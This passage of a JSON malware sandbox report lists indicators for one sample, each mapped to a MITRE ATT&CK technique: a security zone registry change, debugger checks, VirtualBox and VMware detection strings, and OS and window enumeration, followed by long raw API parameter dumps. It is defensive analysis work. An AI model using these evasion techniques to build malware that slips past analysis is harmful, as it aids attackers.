SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "string-183", "type": 2, "relevance": 1, "name": "Contains ability to check debugger is running (API string)", "description": "Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")", "origin": "File/Memory", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "string-148", "type": 2, "relevance": 1, "name": "Contains ability to register a top-level exception handler (API string)", "description": "Found reference to API \"UnhandledExceptionFilter\" (Indicator: \"UnhandledExceptionFilter\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")", "origin": "File/Memory", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-249", "type": 2, "relevance": 1, "name": "Contains ability to retrieve file time (API string)", "description": "Found reference to API \"GetFileTime\" (Indicator: \"GetFileTime\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"GetFileTime\" (Indicator: \"GetFileTime\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-171", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the OS information (API string)", "description": "Found reference to API \"GetVersionExA\" (Indicator: \"GetVersionExA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"GetVersionExA\" (Indicator: \"GetVersion\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"GetVersion\" (Indicator: \"GetVersion\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"2160251256,5176,3024,,RtlGetVersion,NTDLL.dll,\"252:21:43.396\",RX=0,PX=0\" (Indicator: \"GetVersion\"; Source: \"00000000-00005072.00000000.139283.002D0000.00000004.mdmp\")\n Found reference to API \"GetVersionExA\" (Indicator: \"GetVersionExA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API \"GetVersionExA\" (Indicator: \"GetVersion\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API \"GetVersion\" (Indicator: \"GetVersion\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-312", "type": 2, "relevance": 1, "name": "Contains ability to retrieve path in which Windows is installed (API string)", "description": "Found reference to API \"GetWindowsDirectoryA\" (Indicator: \"GetWindowsDirectory\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"GetWindowsDirectoryA\" (Indicator: \"GetWindowsDirectory\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-141", "type": 2, "relevance": 1, "name": "Contains ability to retrieve open application windows (API string)", "description": "Found reference to API \"GetForegroundWindow\" (Indicator: \"GetForegroundWindow\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"EnumWindows\" (Indicator: \"EnumWindows\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"GetWindowTextA\" (Indicator: \"GetWindowText\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"GetActiveWindow\" (Indicator: \"GetActiveWindow\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"8689306471,4932,108,,GetWindowTextA,user32.dll,\"252:21:43.412\",RX=0,PX=0\" (Indicator: \"GetWindowText\"; Source: \"00000000-00004816.00000000.139125.001D0000.00000004.mdmp\")\n Found reference to API \"GetActiveWindow\" (Indicator: \"GetActiveWindow\"; Source: \"00000000-00005072.00000000.139283.0041A000.00000040.mdmp\")\n Found reference to API \"GetWindowTextA\" (Indicator: \"GetWindowText\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API \"GetForegroundWindow\" (Indicator: \"GetForegroundWindow\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API \"EnumWindows\" (Indicator: \"EnumWindows\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-351", "type": 2, "relevance": 1, "name": "Found registry location string related to processor", "description": "Observed string: \"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0\" (Indicator: \"hardware\\description\\system\\centralprocessor\") in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n Observed string: \"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0\" (Indicator: \"hardware\\description\\system\\centralprocessor\") in Source: 00000000-00004816.00000000.139125.0041B000.00000080.mdmp", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-450", "type": 2, "relevance": 1, "name": "Contains ability to determine if process is running under WOW64 (API string)", "description": "Found reference to API \"2986002082,4552,3147,,IsWow64Process,kernel32.dll,\"252:21:41.025\",RX=0,PX=0\" (Indicator: \"IsWow64Process\"; Source: \"00000000-00004816.00000000.139125.001D0000.00000004.mdmp, 00000000-00004816.00000001.139308.001D0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-660", "type": 2, "relevance": 1, "name": "Able to identify virtual/sandbox environment", "description": "Found string \"vboxguestadditions\" (Indicator: \"VBoxGuest\"; Source: \"00000000-00004816.00000001.139308.001D0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-247", "type": 2, "relevance": 1, "name": "Contains ability to retrieve machine time (API string)", "description": "Found reference to API \"GetSystemTime\" (Indicator: \"GetSystemTime\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"GetLocalTime\" (Indicator: \"GetLocalTime\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"GetLocalTime\" (Indicator: \"GetLocalTime\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API \"GetSystemTime\" (Indicator: \"GetSystemTime\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-365", "type": 2, "relevance": 1, "name": "Contains ability to perform scheduled transfer (API string)", "description": "Found reference to API \"GetSystemTime\" (Indicator: \"GetSystemTime\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"GetLocalTime\" (Indicator: \"GetLocalTime\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"GetLocalTime\" (Indicator: \"GetLocalTime\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API \"GetSystemTime\" (Indicator: \"GetSystemTime\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-248", "type": 2, "relevance": 1, "name": "Contains ability to retrieve machine timezone (API string)", "description": "Found reference to API \"GetTimeZoneInformation\" (Indicator: \"GetTimeZoneInformation\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"GetTimeZoneInformation\" (Indicator: \"GetTimeZoneInformation\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb5577781a23000030fd7f9a5cc57700f0fd7f18b812004430fd7f00000000400000003f000000210000000030fd7f0cb81200c15cc5776082cc77210000000030fd7f9a5cc57700f0fd7f30b812005789c4778083cc771317d275d8eb5577 (UID: 00000000-00004816)\n \"dlldsk32.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100009f18d175b06490d800000000e0c2f2760030fd7f6c6590d87cee12000000000078ff1200bd06d375142853adfeffffff7cbdd17502dff276ffffffff000000000000000020df400040f11200000000000000000048f112004cf11200e3084100000000000000000020df400040f11200 (UID: 00000000-00005072)\n \"dlldsk32.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005072)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-167", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the contents of the STARTUPINFO structure (API string)", "description": "Found reference to API \"GetStartupInfoA\" (Indicator: \"GetStartupInfo\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")", "origin": "File/Memory", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-144", "type": 6, "relevance": 3, "name": "Calls an API typically used to open an existing named mutex object", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"OpenMutexA\" with parameter \"Aeb-75\" - (UID: 00000000-00004816)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-661", "type": 2, "relevance": 1, "name": "Able to identify virtual environment by using user activity (API string)", "description": "Found string \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-193", "type": 2, "relevance": 1, "name": "Contains ability to query volume/memory size (API string)", "description": "Found reference to API \"GlobalMemoryStatus\" (Indicator: \"GlobalMemoryStatus\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"GlobalMemoryStatus\" (Indicator: \"GlobalMemoryStatus\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-721", "type": 2, "relevance": 1, "name": "Able to visualize and control listed components (API string)", "description": "Found reference to API \"PostMessageA\" (Indicator: \"postmessage\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"EnumWindows\" (Indicator: \"enumwindows\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"EnumChildWindows\" (Indicator: \"enumchildwindows\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"PostMessageA\" (Indicator: \"postmessage\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API \"EnumChildWindows\" (Indicator: \"enumchildwindows\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API \"EnumWindows\" (Indicator: \"enumwindows\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-78", "type": 3, "relevance": 1, "name": "Contains ability to read software policies", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"AUTHENTICODEENABLED\")\n \"dlldsk32.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\")\n \"cmd.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\")\n \"cmd.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"LEVELS\")\n \"cmd.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"DEFAULTLEVEL\")\n \"cmd.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"SAFERFLAGS\")\n \"cmd.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"POLICYSCOPE\")\n \"cmd.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"LOGFILENAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-668", "type": 2, "relevance": 1, "name": "Able to identify virtual environment using sandbox registry", "description": "Found string \"SOFTWARE\\VMware, Inc.\\VMware Tools\" (Indicator: \"software\\vmware, inc.\\vmware tools\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string \"SOFTWARE\\VMware, Inc.\\VMware Tools\" (Indicator: \"software\\vmware, inc.\\vmware tools\"; Source: \"00000000-00004816.00000000.139125.00423000.00000040.mdmp\")\n Found string \"SOFTWARE\\VMware, Inc.\\VMware Tools\" (Indicator: \"software\\vmware, inc.\\vmware tools\"; Source: \"00000000-00005072.00000000.139289.00423000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000094ed1200000000008e000000e4ed1200feffffff6ced1200cf00c577d600c5770f66ff778e00000047000000e4ed12000000000040ed120000000000a8ed1200 (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002100b03b2100ab3b2100000000000000000000001d000000000164d2120000000000c8df120095e1c0774b992900feffffff435cc4775059c477aa000000b8000000aa3b2100a83b2100ecd3120024d8120000000000000000000000000000000000000000000000000000000000000000001c5cc37760d8d175ffffffff170000009cd3120024000000030000008cd81200b8dd120024d8120086000000c8d3120096edc477d23b2100a06a9a7586000000ecd3120024d812000000000086008800a06a9a75ecd31200916c9a75d23b2100a06a9a75a06a9a755cd8120002020000 (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600cba2c1daaccc12006d82e475f438210004010000 (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000620034003400330033003200360063003300390037006100390062003300380034003100310032003400320039003800620039006100380037006300650039003100630064003800300032006400380034006600630036003800320036006100310036002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2bc4773b3cff77d8eb5577ac011d0000001d00000000000000000016008e00c90400000000000000000000000000000000000017008900c9040000000000000000000008701d0000000000200000000000000000000000 (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036002fa8c1da88c612006d82e4759c9e270004010000 (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036002fa8c1da88c612006d82e475949f270004010000 (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002700f83b0000ff07000000001d00901826007f07000090182600d82f1d00240d0000f8c5120067e5c17700001d00c0a627000000000000001d0000000000c0a6270000000000d00c00dc8000000068a927009018260038652700003b000000001d0000000000c0a627002016000000001d00b8a32700f83b0000ff07000000001d00901826007f070000901826007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036002fa8c1da88c612006d82e4753ca1270004010000 (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002700f83b0000ff07000000001d00901826007f07000090182600d82f1d00ef0c0000f8c5120067e5c17700001d0068a827000000000000001d000000000068a82700000000009b0c00978000000010ab270090182600b8e72500003b000000001d000000000068a827002016000000001d0060a52700f83b0000ff07000000001d00901826007f070000901826007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036002fa8c1da88c612006d82e4756ca2270004010000 (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002700f83b0000ff07000000001d00901826007f07000090182600d82f1d00c90c0000f8c5120067e5c17700001d0098a927000000000000001d000000000098a9270000000000750c00798000000040ac270090182600b8e72500003b000000001d000000000098a927002016000000001d0090a62700f83b0000ff07000000001d00901826007f070000901826007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036002fa8c1da88c612006d82e4759cab270004010000 (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002700f83b0000ff07000000001d00901826007f07000090182600d82f1d00a30b0000f8c5120067e5c17700001d00c8b227000000000000001d0000000000c8b22700000000004f0b00448000000070b5270090182600b8e72500003b000000001d0000000000c8b227002016000000001d00c0af2700f83b0000ff07000000001d00901826007f070000901826007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036002fa8c1da88c612006d82e475c4ac270004010000 (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002700f83b0000ff07000000001d00901826007f07000090182600d82f1d007e0b0000f8c5120067e5c17700001d00f0b327000000000000001d0000000000f0b32700000000002a0b00218000000098b6270090182600b8e72500003b000000001d0000000000f0b327002016000000001d00e8b02700f83b0000ff07000000001d00901826007f070000901826007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036002fa8c1da88c612006d82e475f4ad270004010000 (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002700f83b0000ff07000000001d00901826007f07000090182600d82f1d00580b0000f8c5120067e5c17700001d0020b527000000000000001d000000000020b5270000000000040b000f80000000c8b7270090182600b8e72500003b000000001d000000000020b527002016000000001d0018b22700f83b0000ff07000000001d00901826007f070000901826007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036002fa8c1da88c612006d82e47524af270004010000 (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002700f83b0000ff07000000001d00901826007f07000090182600d82f1d00320b0000f8c5120067e5c17700001d0050b627000000000000001d000000000050b6270000000000de0a00d480000000f8b8270090182600b8e72500003b000000001d000000000050b627002016000000001d0048b32700f83b0000ff07000000001d00901826007f070000901826007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036002fa8c1da88c612006d82e4754cb0270004010000 (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002700f83b0000ff07000000001d00901826007f07000090182600d82f1d000d0b0000f8c5120067e5c17700001d0078b727000000000000001d000000000078b7270000000000b90a00b38000000020ba270090182600b8e72500003b000000001d000000000078b727002016000000001d0070b42700f83b0000ff07000000001d00901826007f070000901826007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036002fa8c1da88c612006d82e47584b1270004010000 (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000058152600c8cf1200b344196c81d01f76000000000000000000000000000000000000000000000000c00200000000000000000000000000001aa2c1da034cc2da84d412005ecb1d76c002000000000000005d1b76e0d612000e5d1b7678d21200dcaa1f76010000000000000072000000ffffffffffffffff00d0120078020000000000002500000000d012007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036007fbec1da58d012006d82e4758cd6270004010000 (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000ffff15001501bb000000620b1d760000000008701d000000000050000000d4d8270002000000d8bc2000000000000100000808a2220030741d00380b1d768cce12000200000040cf12003f08f37602000000d8bc2000000000000100001888fbf27630cf1200c81c1f7606d1120095fbf27664d01200d8bc2000000000000000000000000000eccf120000001d007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600cba1c1daaccf12006d82e4758cd6270004010000 (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600e3a6c1dac4c812006d82e475acdb270004010000 (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"RtlGetVersion\" with parameter 